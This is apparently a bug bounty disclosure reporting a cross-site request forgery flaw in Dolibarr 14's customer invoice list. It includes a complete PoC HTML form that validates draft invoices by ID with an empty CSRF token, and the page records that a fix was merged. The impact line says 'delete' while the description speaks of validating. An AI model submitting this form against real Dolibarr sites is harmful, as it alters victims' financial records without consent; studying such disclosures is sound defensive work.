Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on

Jul 21st 2021


✍️ Description

In Billing | payment section the Customer invoices part, you protect invoice Statuses to any kind of modification from CSRF attacks but if I set CSRF token to nothings then I able to modify arbitrary invoice Statuses only with knowing their ids.

In this PoC.html I am able to Validate any Draft Invoices only with knowing the value of "toselect" parameter.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.dolibarr.org/compta/facture/list.php" method="POST">
      <input type="hidden" name="token" value="" />
      <input type="hidden" name="formfilteraction" value="list" />
      <input type="hidden" name="action" value="list" />
      <input type="hidden" name="sortfield" value="f&#46;fk&#95;statut&#44;f&#46;paye&#44;f&#46;type&#44;dynamount&#95;payed" />
      <input type="hidden" name="sortorder" value="desc&#44;desc&#44;desc&#44;desc" />
      <input type="hidden" name="search&#95;status" value="0" />
      <input type="hidden" name="contextpage" value="invoicelist" />
      <input type="hidden" name="massaction" value="validate" />
      <input type="hidden" name="confirmmassaction" value="Confirm" />
      <input type="hidden" name="pageplusoneold" value="1" />
      <input type="hidden" name="limit" value="25" />
      <input type="hidden" name="pageplusone" value="1" />
      <input type="hidden" name="search&#95;sale" value="&#45;1" />
      <input type="hidden" name="search&#95;user" value="&#45;1" />
      <input type="hidden" name="search&#95;product&#95;category" value="&#45;1" />
      <input type="hidden" name="search&#95;categ&#95;cus" value="&#45;1" />
      <input type="hidden" name="search&#95;ref" value="" />
      <input type="hidden" name="search&#95;company" value="" />
      <input type="hidden" name="search&#95;paymentmode" value="" />
      <input type="hidden" name="search&#95;montant&#95;ht" value="" />
      <input type="hidden" name="search&#95;montant&#95;ttc" value="" />
      <input type="hidden" name="search&#95;multicurrency&#95;montant&#95;vat" value="" />
      <input type="hidden" name="search&#95;status" value="0" />
      <input type="hidden" name="selectedfields" value="f&#46;ref&#44;s&#46;nom&#44;f&#46;total&#95;ht&#44;f&#46;total&#95;ttc&#44;dynamount&#95;payed&#44;rtp&#44;f&#46;multicurrency&#95;total&#95;vat&#44;f&#46;fk&#95;mode&#95;reglement&#44;f&#46;fk&#95;statut&#44;" />
      <input type="hidden" name="toselect&#91;&#93;" value="7890" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of delete mentioned Invoices. version of application == 14 (tested on demo website)

We have contacted a member of the dolibarr team and are waiting to hear back 4 months ago
Laurent Destailleur confirmed that a fix has been merged on 89e8f2 3 months ago
Laurent Destailleur has been awarded the fix bounty